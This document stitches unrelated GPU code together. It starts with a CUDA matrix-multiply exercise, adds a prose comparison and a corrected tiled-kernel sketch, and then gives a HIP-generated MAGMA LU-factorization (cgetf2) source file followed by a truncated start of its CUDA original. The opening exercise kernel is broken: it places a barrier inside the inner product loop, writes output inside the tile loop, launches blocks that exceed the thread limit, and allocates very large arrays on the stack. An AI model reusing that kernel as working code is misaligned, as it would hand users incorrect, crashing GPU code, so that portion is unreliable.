#include <stdio.h> #include <cstdlib> #include <iostream> #include <vector> #define BS 32 #define NUM_BLOCKS 1500 #define NUM_THREADS_PER_BLOCK 1500 #define SIZE NUM_BLOCKS*NUM_THREADS_PER_BLOCK using namespace std; cudaEvent_t start, stop; // These are specific to measure the execution of only the kernel execution - might be useful void startKernelTime (void) { cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); } void stopKernelTime (void) { cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); cout << milliseconds << " ms have elapsed for the CUDA execution" << endl; } void checkCUDAError (const char *msg) { cudaError_t err = cudaGetLastError(); if( cudaSuccess != err) { cerr << "Cuda error: " << msg << ", " << cudaGetErrorString( err) << endl; exit(-1); } } // Fill the input parameters and kernel qualifier __global__ void dotKernel (float *dev_m1, float *dev_m2, float *dev_output) { __shared__ float shareA[BS][BS]; __shared__ float shareB[BS][BS]; int bx = blockIdx.x; int by = blockIdx.y; int tx = threadIdx.x; int ty = threadIdx.y; int row = by * BS + ty; int col = bx * BS + tx; float tmp_sum = 0.0f; for(int i = 0; i < NUM_BLOCKS/BS; ++i){ shareA[ty][tx] = dev_m1[row* NUM_BLOCKS + (i * BS + tx)]; shareB[ty][tx] = dev_m2[(i * BS + ty) * NUM_BLOCKS + col]; __syncthreads(); for(int k = 0; k < BS; ++k){ tmp_sum += shareA[ty][k] * shareB[k][tx]; __syncthreads(); } dev_output[row * NUM_BLOCKS + col] = tmp_sum; } } // Fill with the code required for the GPU dot (mem allocation, transfers, kernel launch of dotKernel) float* dotGPU (float *m1, float *m2) { float *dev_m1, *dev_m2, *dev_output; float *array_output = new float [SIZE]; // allocate the memory on the device cudaMalloc((void**) &dev_m1, sizeof(float) * SIZE); cudaMalloc((void**) &dev_m2, sizeof(float) * SIZE); cudaMalloc((void**) &dev_output, sizeof(float) * SIZE); startKernelTime(); // copy inputs to the device cudaMemcpy(dev_m1, m1, sizeof(float) * SIZE, cudaMemcpyHostToDevice); cudaMemcpy(dev_m2, m2, sizeof(float) * SIZE, cudaMemcpyHostToDevice); cudaMemcpy(dev_output, array_output, sizeof(float) * SIZE, cudaMemcpyHostToDevice); dim3 blocksPerGrid(BS, BS, 1); dim3 threadsPerBlock(NUM_THREADS_PER_BLOCK/BS, NUM_THREADS_PER_BLOCK/BS, 1); // launch the kernel dotKernel <<< blocksPerGrid, threadsPerBlock >>> (dev_m1, dev_m2, dev_output); // copy the output to the host cudaMemcpy(array_output, dev_output, sizeof(float) * SIZE, cudaMemcpyDeviceToHost); stopKernelTime(); for(size_t i = 0; i < 512; i++) { cout << array_output[i] << '\n'; } // free the device memory cudaFree(dev_m1); cudaFree(dev_m2); cudaFree(dev_output); return array_output; } int main (int argc, char** argv) { float array1 [SIZE]; float array2 [SIZE]; // initialize array with random values for (unsigned i = 0; i < SIZE; i++) { array1[i] = ((float) rand()) / ((float) RAND_MAX) * 10; array2[i] = 1; } for(size_t i = 0; i < 4; i++) { cout << array1[i * NUM_BLOCKS] << '\n'; } dotGPU(array1, array2); return 0; }
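For comparison with dotKernel above, the canonical shared-memory tiling performs the inner product between two barriers and stores the accumulated value once, after the last tile, and the launch puts BS x BS threads in each block with enough blocks to cover the matrix; since 1500 is not a multiple of 32, the edge tiles are zero-padded. A self-contained sketch using the same BS / NUM_BLOCKS constants (kernel name invented):

__global__ void dotKernelTiled(const float *dev_m1, const float *dev_m2, float *dev_output)
{
    __shared__ float shareA[BS][BS];
    __shared__ float shareB[BS][BS];
    int row = blockIdx.y * BS + threadIdx.y;
    int col = blockIdx.x * BS + threadIdx.x;
    float tmp_sum = 0.0f;
    for (int t = 0; t < (NUM_BLOCKS + BS - 1) / BS; ++t) {
        int a_col = t * BS + threadIdx.x;
        int b_row = t * BS + threadIdx.y;
        shareA[threadIdx.y][threadIdx.x] =
            (row < NUM_BLOCKS && a_col < NUM_BLOCKS) ? dev_m1[row * NUM_BLOCKS + a_col] : 0.0f;
        shareB[threadIdx.y][threadIdx.x] =
            (b_row < NUM_BLOCKS && col < NUM_BLOCKS) ? dev_m2[b_row * NUM_BLOCKS + col] : 0.0f;
        __syncthreads();                      // both tiles fully loaded
        for (int k = 0; k < BS; ++k)
            tmp_sum += shareA[threadIdx.y][k] * shareB[k][threadIdx.x];
        __syncthreads();                      // everyone done reading before the next load
    }
    if (row < NUM_BLOCKS && col < NUM_BLOCKS)
        dev_output[row * NUM_BLOCKS + col] = tmp_sum;   // single store after all tiles
}

// Matching launch configuration (1024 threads per block, grid covers 1500x1500):
//   dim3 threadsPerBlock(BS, BS, 1);
//   dim3 blocksPerGrid((NUM_BLOCKS + BS - 1) / BS, (NUM_BLOCKS + BS - 1) / BS, 1);
//   dotKernelTiled<<<blocksPerGrid, threadsPerBlock>>>(dev_m1, dev_m2, dev_output);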
c6d2fbd237466acc4c713616d2e9d72a79bac49e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* -- MAGMA (version 2.5.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date January 2019 @author Azzam Haidar @author Ahmad Abdelfattah @generated from magmablas/zgetf2_native_kernel.cu, normal z -> c, Wed Jan 2 14:18:51 2019 */ #include "magma_internal.h" #include "magma_templates.h" #include "shuffle.cuh" #include "sync.cuh" #include "atomics.cuh" #include "batched_kernel_param.h" #define PRECISION_c /** Purpose ------- LU factorization of m-by-n matrix ( m >= n ). Each thread block caches an entire column in register. Thread blocks communicate and synchronize through global memory. Assumptions: 1. dA is of size MxN such that N <= M. 2. Thread block must be 1D, with TX multiple of 32 (warp size) 3. TX must be >= n 4. n must be less than the number of SMs on the GPU **/ // ============================================================================= // init kernel __global__ void cgetf2_native_init_kernel( int n, int npages, magma_int_t *ipiv, int* update_flags) { const int tx = threadIdx.x; if( tx < n){ ipiv[ tx ] = 0; } if( tx < max(n,npages) ){ update_flags[ tx ] = 0; } } // ============================================================================= // the main kernel template<int TX, int NPAGES> __global__ void cgetf2_native_kernel( int m, int n, magmaFloatComplex_ptr dA, int ldda, volatile magma_int_t *ipiv, int gbstep, volatile int* update_flag, volatile magma_int_t *info) { const int tx = threadIdx.x; const int bx = blockIdx.x; magmaFloatComplex rA[NPAGES] = {MAGMA_C_ZERO}; magmaFloatComplex rx, rx_max; magmaFloatComplex_ptr da = dA; int rx_id, max_id, flag = 0; float rx_abs = 0.0, rx_abs_max = 0.0; const int m_ = m-(NPAGES-1)*TX; if( bx >= n ) return; __shared__ magmaFloatComplex sx[ TX ]; __shared__ float sabs[ TX ]; __shared__ int smax_id[ TX ]; __shared__ magmaFloatComplex sreg; // read dA += bx * ldda + tx; #pragma unroll for(int i = 0; i < NPAGES-1; i++){ rA[i] = dA[ i * TX ]; } if( tx < m_){ rA[NPAGES-1] = dA[ (NPAGES-1) * TX ]; } // main loop #pragma unroll for(int i = 0; i < n; i++){ // icamax and write pivot for the ith thread block if(bx == i){ rx_max = rx = (tx < i) ? 
MAGMA_C_ZERO : rA[0]; rx_abs_max = rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); max_id = rx_id = tx; #pragma unroll for(int j = 1; j < NPAGES; j++){ rx = rA[j]; rx_abs = fabs(MAGMA_C_REAL(rx)) + fabs(MAGMA_C_IMAG(rx)); if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = j * TX + tx; } } sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; __syncthreads(); // let the first warp do the final reduction step if(tx < 32){ #pragma unroll for(int j = 0; j < TX; j+= 32){ rx = sx[ j + tx ]; rx_abs = sabs[ j + tx ]; rx_id = smax_id[ j + tx ]; if ( rx_abs > rx_abs_max ){ rx_max = rx; rx_abs_max = rx_abs; max_id = rx_id; } } magmablas_syncwarp(); sx[ tx ] = rx_max; sabs[ tx ] = rx_abs_max; smax_id[ tx ] = max_id; magmablas_syncwarp(); #pragma unroll for(int j = 0; j < 32; j++){ rx = sx[j]; rx_abs = sabs[j]; rx_id = smax_id[j]; if ( rx_abs > rx_abs_max ){ rx_abs_max = rx_abs; rx_max = rx; max_id = rx_id; } } } if(tx == 0){ sx[ 0 ] = rx_max; sabs[ 0 ] = rx_abs_max; smax_id[ 0 ] = max_id; } __syncthreads(); rx_max = sx[ 0 ]; rx_abs_max = sabs[ 0 ]; max_id = smax_id[ 0 ]; __syncthreads(); // now every thread in the i^th block has the maximum if( tx == 0){ if( rx_abs_max == MAGMA_D_ZERO){ magmablas_iatomic_exchange( (magma_int_t*)info, (magma_int_t)(max_id + gbstep + 1) ); } magmablas_iatomic_exchange((magma_int_t*)&ipiv[i], (magma_int_t)(max_id+1) ); // fortran indexing } __syncthreads(); if( rx_abs_max == MAGMA_D_ZERO )return; } else{ // other thread blocks are waiting if(tx == 0){ max_id = 0; while( max_id == 0 ){ max_id = ipiv[i]; }; smax_id[ 0 ] = max_id; } __syncthreads(); max_id = smax_id[ 0 ]; max_id -= 1; // revert fortran indexing __syncthreads(); if( (*info) != 0 ) return; } // swap // swap always happens between page 0 and page x // to avoid spilling rA to local memory, we use shared memory if( max_id != i){ // all blocks swap in registers // for bx < i, the column is already written in memory, // but we have a copy in reg., so continue to swap in reg., // and do one final write to memory #pragma unroll for(int j = 0; j < NPAGES; j++){ if( j == (max_id/TX) ){ sx[ tx ] = rA[j]; __syncthreads(); if( tx == i ){ magmaFloatComplex tmp = sx[ max_id%TX ]; sx[ max_id%TX ] = rA[0]; rA[0] = tmp; } __syncthreads(); if( tx == max_id%TX ){ rA[j] = sx[ tx ]; } __syncthreads(); } } //__syncthreads(); } // the ith block does scal if(bx == i){ magmaFloatComplex reg = MAGMA_C_DIV(MAGMA_C_ONE, rx_max ); // scal if( tx > i ){ rA[0] *= reg; } #pragma unroll for(int j = 1; j < NPAGES; j++){ rA[j] *= reg; } // write column i to global memory #pragma unroll for(int j = 0; j < NPAGES-1; j++){ dA[ j * TX ] = rA[j]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } __threadfence(); __syncthreads(); // after cuda 9.0, both are needed, not sure why if(tx == 0) magmablas_iatomic_exchange( (int *)&update_flag[ i ], 1); } // thread blocks with ID larger than i perform ger if(bx > i){ if( tx == i ){ sreg = rA[0]; } // wait for scal if( tx == 0){ flag = 0; while( flag == 0 ){ flag = update_flag[ i ]; }; } __syncthreads(); magmaFloatComplex reg = sreg; if( NPAGES == 1){ if(tx > i && tx < m_){ rA[0] -= da[ i * ldda + tx ] * reg; } }else{ if(tx > i){ rA[0] -= da[ i * ldda + tx ] * reg; } } #pragma unroll for(int j = 1; j < NPAGES-1; j++){ rA[j] -= da[ i * ldda + j * TX + tx ] * reg; } if( NPAGES > 1){ if( tx < m_ ){ rA[ NPAGES-1 ] -= da[ i * ldda + (NPAGES-1)*TX + tx ] * reg; } } } } // all blocks write their columns again except the last one if( bx < n-1 ){ #pragma unroll 
for(int i = 0; i < NPAGES-1; i++){ dA[ i * TX ] = rA[i]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } } } // ============================================================================= extern "C" magma_int_t magma_cgetf2_native_fused( magma_int_t m, magma_int_t n, magmaFloatComplex_ptr dA, magma_int_t ldda, magma_int_t *ipiv, magma_int_t gbstep, magma_int_t *flags, magma_int_t *info, magma_queue_t queue ) { magma_int_t arginfo = 0; const magma_int_t ntx = CGETF2_FUSED_NTH; if( m < n || m > CGETF2_FUSED_MAX_M ){ arginfo = -1; } else if( n > magma_getdevice_multiprocessor_count() ){ arginfo = -2; } else if( ldda < max(1, m) ){ arginfo = -4; } if (arginfo != 0) { magma_xerbla( __func__, -(arginfo) ); return arginfo; } magma_int_t arch = magma_getdevice_arch(); dim3 grid(n, 1, 1); dim3 threads(ntx, 1, 1); const magma_int_t npages = magma_ceildiv(m, ntx); // the kernel uses communication among thread blocks // as a safeguard, force one thread block per multiprocessor // by allocating more than half the shared memory magma_int_t shmem = magma_getdevice_shmem_block(); shmem = (shmem / 2); int *update_flag = (int*) flags; // update_flag is an int, not magma_int_t hipLaunchKernelGGL(( cgetf2_native_init_kernel), dim3(1), dim3(max(n,npages)), 0, queue->cuda_stream() , n, npages, ipiv, update_flag); // The case statement should cover up to ( xGETF2_CHAIN_MAX_M / ntx ) switch(npages){ case 1:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 1>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 2:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 2>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 3:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 3>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 4:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 4>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 5:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 5>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 6:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 6>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 7:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 7>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 8:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 8>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 9:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 9>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 10:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 10>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 11:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 11>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 12:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 12>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 13:hipLaunchKernelGGL(( cgetf2_native_kernel< 
ntx, 13>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 14:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 14>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 15:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 15>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 16:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 16>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 17:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 17>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 18:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 18>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 19:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 19>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 20:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 20>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #if defined(PRECISION_s) || defined(PRECISION_d) case 21:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 21>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 22:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 22>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 23:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 23>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 24:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 24>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 25:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 25>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 26:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 26>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 27:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 27>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 28:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 28>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 29:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 29>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 30:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 30>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 31:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 31>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 32:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 32>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 33:hipLaunchKernelGGL(( 
cgetf2_native_kernel< ntx, 33>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 34:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 34>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 35:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 35>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 36:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 36>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 37:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 37>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 38:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 38>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 39:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 39>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 40:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 40>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 41:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 41>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 42:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 42>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 43:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 43>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 44:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 44>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 45:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 45>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 46:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 46>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 47:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 47>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 48:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 48>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 49:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 49>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 50:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 50>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) || defined(PRECISION_d) #if defined(PRECISION_s) case 51:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 51>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 52:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 52>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, 
update_flag, info); break; case 53:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 53>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 54:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 54>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 55:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 55>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 56:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 56>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 57:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 57>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 58:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 58>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 59:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 59>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 60:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 60>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 61:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 61>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 62:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 62>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 63:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 63>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 64:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 64>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 65:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 65>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 66:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 66>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 67:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 67>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 68:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 68>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 69:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 69>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 70:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 70>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 71:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 71>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 72:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 72>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 
73:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 73>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 74:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 74>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 75:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 75>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 76:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 76>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 77:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 77>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 78:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 78>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 79:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 79>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 80:hipLaunchKernelGGL(( cgetf2_native_kernel< ntx, 80>), dim3(grid), dim3(threads), shmem, queue->cuda_stream() , m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) default: printf("size not supported \n"); } return 0; }
c6d2fbd237466acc4c713616d2e9d72a79bac49e.cu
/* -- MAGMA (version 2.5.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date January 2019 @author Azzam Haidar @author Ahmad Abdelfattah @generated from magmablas/zgetf2_native_kernel.cu, normal z -> c, Wed Jan 2 14:18:51 2019 */ #include "magma_internal.h" #include "magma_templates.h" #include "shuffle.cuh" #include "sync.cuh" #include "atomics.cuh" #include "batched_kernel_param.h" #define PRECISION_c /** Purpose ------- LU factorization of m-by-n matrix ( m >= n ). Each thread block caches an entire column in register. Thread blocks communicate and synchronize through global memory. Assumptions: 1. dA is of size MxN such that N <= M. 2. Thread block must be 1D, with TX multiple of 32 (warp size) 3. TX must be >= n 4. n must be less than the number of SMs on the GPU **/ // ============================================================================= // init kernel __global__ void cgetf2_native_init_kernel( int n, int npages, magma_int_t *ipiv, int* update_flags) { const int tx = threadIdx.x; if( tx < n){ ipiv[ tx ] = 0; } if( tx < max(n,npages) ){ update_flags[ tx ] = 0; } } // ============================================================================= // the main kernel template<int TX, int NPAGES> __global__ void cgetf2_native_kernel( int m, int n, magmaFloatComplex_ptr dA, int ldda, volatile magma_int_t *ipiv, int gbstep, volatile int* update_flag, volatile magma_int_t *info) { const int tx = threadIdx.x; const int bx = blockIdx.x; magmaFloatComplex rA[NPAGES] = {MAGMA_C_ZERO}; magmaFloatComplex rx, rx_max; magmaFloatComplex_ptr da = dA; int rx_id, max_id, flag = 0; float rx_abs = 0.0, rx_abs_max = 0.0; const int m_ = m-(NPAGES-1)*TX; if( bx >= n ) return; __shared__ magmaFloatComplex sx[ TX ]; __shared__ float sabs[ TX ]; __shared__ int smax_id[ TX ]; __shared__ magmaFloatComplex 